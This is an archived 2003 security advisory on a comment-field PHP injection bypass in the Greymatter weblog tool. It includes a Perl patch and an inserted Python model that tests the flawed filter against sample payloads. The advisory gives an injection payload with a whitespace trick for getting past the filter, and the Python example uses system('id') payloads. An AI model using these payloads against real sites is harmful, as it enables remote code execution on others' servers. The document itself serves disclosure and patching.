Greymatter v1.21d: Remote PHP command injection/execution.

From: FraMe (frameat_private)
Date: Wed Jul 02 2003 - 06:11:36 PDT


    Product: Greymatter v1.21d
    Vendor: Noah Grey - GreySoft
    Author: FraMe ( frame at kernelpanik.org )
    URL: http://www.kernelpanik.org
    
    CONTENTS
    
    1. Overview
    2. Description
    3. How to exploit it?
    4. Impact
    5. Patch
    6. Vendor Response
    7. Greetings
    
    1. Overview
    
    Greymatter is a news/weblog tool written in Perl. It uses HTML files as
    its storage backend; comments are written into those files.
    
    2. Description
    
    Greymatter v1.21d was released to patch a PHP injection vulnerability
    ( http://www.securityfocus.com/bid/7055 ) in the comments system. The new
    check only looks for the "<?" and "?>" tags; it does not check for the
    alternative PHP open tag <script language="php"> or for "<%" (ASP-style
    tags, which are off by default in PHP).
    
    3. How to exploit it?
    
    Easy: in the name, email or URL fields, a user can enter, for example:
    
    <script language="php">PHPCOMMAND;</script >
    
    Note: the blank space in "</script >" is necessary; it avoids the other checks.
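    The following is an added example, not code from the original post or from
    Greymatter itself. It models the situation described in sections 2 and 3 in
    Python (chosen so it can be run offline; Greymatter itself is Perl): the
    v1.21d-style check that only rejects "<?" / "?>", the payloads that slip
    past it, and the encoding fix from section 5 applied to the same inputs.
    The literal "</script>" check is an assumption standing in for the "other
    checks" the note above mentions; the payloads and the placeholder
    system("id") for PHPCOMMAND are constructed for this example.

```python
import re

# Payloads constructed for this example. The <script language="php"> form and
# the "</script >" spacing are the ones the advisory names; "<%" is the
# ASP-style open tag, which PHP only honours when asp_tags is enabled.
PAYLOADS = {
    "short_tag":  '<? system("id"); ?>',
    "script_tag": '<script language="php">system("id");</script >',
    "asp_tag":    '<% system("id"); %>',
    "plain_text": "Nice post, thanks!",
}

# Every open-tag form the PHP parser recognises for a code block.
PHP_OPEN_TAG = re.compile(
    r'<\?|<script\s+language\s*=\s*["\']?php["\']?\s*>|<%', re.IGNORECASE)


def v121d_rejects(field: str) -> bool:
    """Model of the v1.21d comment check as the advisory describes it: it
    looks only for the "<?" and "?>" pair. The literal "</script>" test is an
    assumed stand-in for the 'other checks' that the trailing space in
    "</script >" is said to dodge (assumption, not from the post)."""
    if "<?" in field or "?>" in field:
        return True
    if "</script>" in field.lower():
        return True
    return False


def gm_htmlspecial(field: str) -> str:
    """The fix from section 5, in Python: encode every "<" and ">" so that no
    tag of any form can survive into the stored comment file."""
    return field.replace("<", "&lt;").replace(">", "&gt;")


def php_would_execute(stored: str, asp_tags: bool = False) -> bool:
    """True if a comment file containing `stored` would hand code to the PHP
    interpreter when the web server parses that file as PHP."""
    for m in PHP_OPEN_TAG.finditer(stored):
        if m.group(0) == "<%" and not asp_tags:
            continue  # ASP-style tags are ignored unless asp_tags=On
        return True
    return False


def evaluate(payloads=PAYLOADS, asp_tags: bool = False) -> dict:
    """For each payload: is it blocked by the v1.21d check, would it run on an
    unpatched install, and does anything executable remain after encoding?"""
    results = {}
    for name, payload in payloads.items():
        blocked = v121d_rejects(payload)
        results[name] = {
            "blocked_by_v121d": blocked,
            "executes_unpatched": (not blocked) and php_would_execute(payload, asp_tags),
            "executes_patched": php_would_execute(gm_htmlspecial(payload), asp_tags),
        }
    return results


if __name__ == "__main__":
    for asp in (False, True):
        print(f"asp_tags={'On' if asp else 'Off'}")
        for name, r in evaluate(asp_tags=asp).items():
            print(f"  {name:11s} blocked={r['blocked_by_v121d']!s:5s} "
                  f"unpatched_exec={r['executes_unpatched']!s:5s} "
                  f"patched_exec={r['executes_patched']!s:5s}")
```

    Run as-is it prints one row per payload: the "<?" form is caught by the
    v1.21d check, the <script language="php"> form is not and would execute,
    the "<%" form only executes when asp_tags is on, and after encoding none of
    them contains a PHP open tag. Encoding is the application-side fix; the
    caveat for a practitioner is that the root exposure is the web server
    handing Greymatter's comment files to the PHP interpreter at all, so that
    server configuration is worth reviewing alongside the patch.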
    
    4. Impact
    
    If the comment file is parsed by PHP, the result is remote PHP code
    execution, usually with the web server's privileges.
    
    5. Patch
    
    sub gm_htmlspecial {
    
        # HTML-encode every "<" and ">" in the user-supplied comment fields, so
        # that no tag of any form ("<?", <script language="php">, "<%") can
        # survive into the stored comment file.
        for my $field (qw(newcommentbody newcommentauthor newcommentemail newcommenthomepage)) {
            next unless defined $IN{$field};
    
            # Convert "<"
            $IN{$field} =~ s/</&lt;/g;
    
            # Convert ">"
            $IN{$field} =~ s/>/&gt;/g;
        }
    }
    
    Note: gm-comments.cgi patched can be downloaded from:
    http://www.kernelpanik.org/code/kernelpanik/gmc.zip
    
    6. Vendor Response
    
    02/07/03: Posted in the Greymatter support forum.
                    Sent to Bugtraq.
    
    7. Greetings
    
    Fermín J. Serna <fjserna at ngsec.com> (aka Zhodiac)
    
    ==============================
    [ FraMe - frame at kernelpanik.org ]
    [ URL - http://frame.lifefromthenet.com ]
    [ Kernelpanik - http://www.kernelpanik.org ]
    [ PGP KeyID - 0xFA81AC9C ]
    ==============================
    



    This archive was generated by hypermail 2b30 : Wed Jul 02 2003 - 15:19:56 PDT